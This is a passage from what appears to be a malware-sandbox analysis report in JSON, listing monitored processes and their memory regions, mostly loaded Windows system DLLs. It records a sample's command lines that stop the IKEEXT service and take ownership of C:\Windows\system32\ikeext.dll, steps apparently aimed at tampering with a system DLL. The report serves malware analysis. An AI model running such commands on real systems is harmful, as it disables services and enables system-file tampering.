"region", "version": 1 }, "end_va": 1910382591, "entry_point": 1910308864, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_962", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1910308864, "timestamp": "00:00:47.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1934491648, "type": "region", "version": 1 }, "end_va": 1934553087, "entry_point": 1934491648, "filename": "\\Windows\\System32\\samcli.dll", "id": "region_963", "name": "samcli.dll", "norm_filename": "c:\\windows\\system32\\samcli.dll", "region_type": "memory_mapped_file", "start_va": 1934491648, "timestamp": "00:00:47.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1944518656, "type": "region", "version": 1 }, "end_va": 1944580095, "entry_point": 1944518656, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_964", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1944518656, "timestamp": "00:00:47.368", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944584192, "type": "region", "version": 1 }, "end_va": 1944621055, "entry_point": 1944584192, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_965", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944584192, "timestamp": "00:00:47.377", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1947074560, "type": "region", "version": 1 }, "end_va": 1947103231, "entry_point": 1947079309, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_966", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1947074560, "timestamp": "00:00:47.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947254783, "entry_point": 1947182129, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_967", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:00:47.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965723647, "entry_point": 1965626137, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_968", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:00:47.383", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_969", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_970", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:47.384", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_971", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:47.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_972", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:47.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_973", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_974", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_975", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:00:47.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_976", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.387", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\net1 stop /y ikeext", "filename": "c:\\windows\\system32\\net1.exe", "id": "proc_9", "image_name": "net1.exe", "monitor_reason": "child_process", "monitored_id": 9, "origin_monitor_id": 8, "ref_parent_process": { "ref_id": "proc_8", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000009-region_00000977-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_977", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_978", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_979", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.453", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00000980-addr_0x00000000000f0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1507327, "entry_point": 0, "filename": null, "id": "region_980", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:47.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 15794176, "type": "region", "version": 1 }, "end_va": 15966207, "entry_point": 15794176, "filename": "\\Windows\\System32\\net1.exe", "id": "region_981", "name": "net1.exe", "norm_filename": "c:\\windows\\system32\\net1.exe", "region_type": "memory_mapped_file", "start_va": 15794176, "timestamp": "00:00:47.454", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_982", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_983", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:47.472", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_984", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:47.475", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00000985-addr_0x000000007ffd7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147315712, "type": "region", "version": 1 }, "end_va": 2147319807, "entry_point": 0, "filename": null, "id": "region_985", "name": "private_0x000000007ffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147315712, "timestamp": "00:00:47.476", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00000986-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_986", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:47.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_987", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:47.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_988", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:47.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_989", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:47.504", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00000990-addr_0x0000000000170000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_990", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:47.506", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00000991-addr_0x0000000000390000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_200", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 0, "filename": null, "id": "region_991", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:47.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1829699584, "type": "region", "version": 1 }, "end_va": 1829752831, "entry_point": 1829704400, "filename": "\\Windows\\System32\\browcli.dll", "id": "region_992", "name": "browcli.dll", "norm_filename": "c:\\windows\\system32\\browcli.dll", "region_type": "memory_mapped_file", "start_va": 1829699584, "timestamp": "00:00:47.506", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1875771392, "type": "region", "version": 1 }, "end_va": 1875869695, "entry_point": 1875771392, "filename": "\\Windows\\System32\\ntdsapi.dll", "id": "region_993", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\system32\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1875771392, "timestamp": "00:00:47.507", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1934491648, "type": "region", "version": 1 }, "end_va": 1934553087, "entry_point": 1934496350, "filename": "\\Windows\\System32\\samcli.dll", "id": "region_994", "name": "samcli.dll", "norm_filename": "c:\\windows\\system32\\samcli.dll", "region_type": "memory_mapped_file", "start_va": 1934491648, "timestamp": "00:00:47.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1939931136, "type": "region", "version": 1 }, "end_va": 1940004863, "entry_point": 1939931136, "filename": "\\Windows\\System32\\samlib.dll", "id": "region_995", "name": "samlib.dll", "norm_filename": "c:\\windows\\system32\\samlib.dll", "region_type": "memory_mapped_file", "start_va": 1939931136, "timestamp": "00:00:47.516", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1944518656, "type": "region", "version": 1 }, "end_va": 1944580095, "entry_point": 1944523425, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_996", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1944518656, "timestamp": "00:00:47.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1944584192, "type": "region", "version": 1 }, "end_va": 1944621055, "entry_point": 1944589734, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_997", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1944584192, "timestamp": "00:00:47.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1944649728, "type": "region", "version": 1 }, "end_va": 1944719359, "entry_point": 1944649728, "filename": "\\Windows\\System32\\netapi32.dll", "id": "region_998", "name": "netapi32.dll", "norm_filename": "c:\\windows\\system32\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1944649728, "timestamp": "00:00:47.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1947860992, "type": "region", "version": 1 }, "end_va": 1947897855, "entry_point": 1947860992, "filename": "\\Windows\\System32\\dsrole.dll", "id": "region_999", "name": "dsrole.dll", "norm_filename": "c:\\windows\\system32\\dsrole.dll", "region_type": "memory_mapped_file", "start_va": 1947860992, "timestamp": "00:00:47.538", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 139264, "start_va": 1959591936, "type": "region", "version": 1 }, "end_va": 1959731199, "entry_point": 1959591936, "filename": "\\Windows\\System32\\logoncli.dll", "id": "region_1000", "name": "logoncli.dll", "norm_filename": "c:\\windows\\system32\\logoncli.dll", "region_type": "memory_mapped_file", "start_va": 1959591936, "timestamp": "00:00:47.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1965621248, "type": "region", "version": 1 }, "end_va": 1965723647, "entry_point": 1965626137, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1001", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1965621248, "timestamp": "00:00:47.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1002", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:47.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1003", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:47.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1004", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:47.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1005", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:47.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1006", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:47.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1007", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:47.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1008", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:00:47.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1009", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:00:47.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1010", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:47.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8192, "start_va": 1829634048, "type": "region", "version": 1 }, "end_va": 1829642239, "entry_point": 1829634048, "filename": "\\Windows\\System32\\netmsg.dll", "id": "region_1011", "name": "netmsg.dll", "norm_filename": "c:\\windows\\system32\\netmsg.dll", "region_type": "memory_mapped_file", "start_va": 1829634048, "timestamp": "00:00:47.569", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\system32\\cmd.exe /c \"takeown /F C:\\Windows\\system32\\ikeext.dll\"", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_10", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 6, "ref_parent_process": { "ref_id": "proc_6", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000010-region_00001012-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_201", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1012", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:47.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1013", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:47.596", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1014", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:47.596", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001015-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_202", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1015", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1016", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:47.597", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1017", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:47.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": 